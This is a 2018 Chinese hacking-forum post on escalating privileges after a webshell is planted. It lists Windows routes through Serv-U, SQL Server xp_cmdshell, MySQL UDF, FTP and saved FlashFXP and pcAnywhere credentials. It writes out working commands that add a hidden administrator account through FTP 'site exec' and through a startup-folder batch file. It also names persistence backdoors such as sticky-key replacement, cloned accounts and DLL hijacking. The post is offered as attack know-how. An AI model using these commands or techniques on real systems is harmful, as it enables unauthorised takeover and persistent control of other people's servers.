关于提权的一些基础知识-女黑客-必火安全学院

女黑客

 找回密码
 立即注册

QQ登录

只需一步,快速开始

关于提权的一些基础知识

[复制链接]
发表于 2018-10-1 10:52:03 | 显示全部楼层 |阅读模式
提权,就是拿到webshell后,将普通用户的权限,提升为管理员的权限。
提权分为两种:
0x01: 溢出提权
0x02:第三方组件提权
一,linux提权,请查看:
http://www.nvhack.com/forum.php?mod=viewthread&tid=7292#lastpost
二,windows提权
1,windows提权时,看用户是否可执行溢出程序
asp的脚本语言依靠的是 "wscript.shell" 命令执行组件,
asp.net 脚本语言依靠的是 ".net framework"
jsp脚本语言依靠的是 ”jvm"

webshell中  执行  /c net user
/c:表示执行命令后终止
/k:执行命令后保留
/s:修改/c或/k之后的字符串处理
/Q:关闭显示
/D:禁止从注册表执行AutoRun命令
/A:使管道或文件的内部命令输出成为ANSI:
/U: 使管道或文件的内部命令输出成为Unicode。
2,第三方服务提权
serv-u :43958
sqlserver :1433,sa权限,xp_cmdshell
mysql:3306:udf提权
ftp提权:20:用于在客户端和服务器之间传输数据,21:用于传输控制流,并且是命令通向ftp服务器的进口
  1. ftp 172.18.199.10

  2. ftp> quote site exec net user temp 123456 /add
  3. ftp> quote site exec net localgroup administratos temp/add
复制代码
G6ftp提权:
filezilla提权:
flashfxp提权:Sites.dat,Stats.dat,quick.dat,这三个文件保存着历史遗留的ftp信息。下载覆盖掉,本低flashfxp,星号密码查看器查看密码
pcAnywhere 提权:5631,下载配置文件,pca.*.cif 结尾,位置:c:\...application data/sysmantec/pcanywhere/hosts中。
星外主机提权,iis.exe -i ,iis.exe -u id号,直接读密码
启动项提权:建立cmd.bat脚本,放到c:\documents and Settings\administrator\[开始]\菜单\程序\启动\中
代码如下:
  1. @echo off
  2. net user nvhack 123123 /add
  3. net localgroup administrators nvhack /add
复制代码
这个cmd会有cmd黑框,可以使用vbs脚本。
dll劫持。粘滞键后门.
后门种类:
远程控制程序,服务管理账号后门,克隆账户,administrator账户密码,线程插入后门,web后门。





回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|小黑屋|女黑客 |网站地图

© Copyright 2021 版权所有(一极教育科技有限公司)

津ICP备17008032号-3
快速回复 返回顶部 返回列表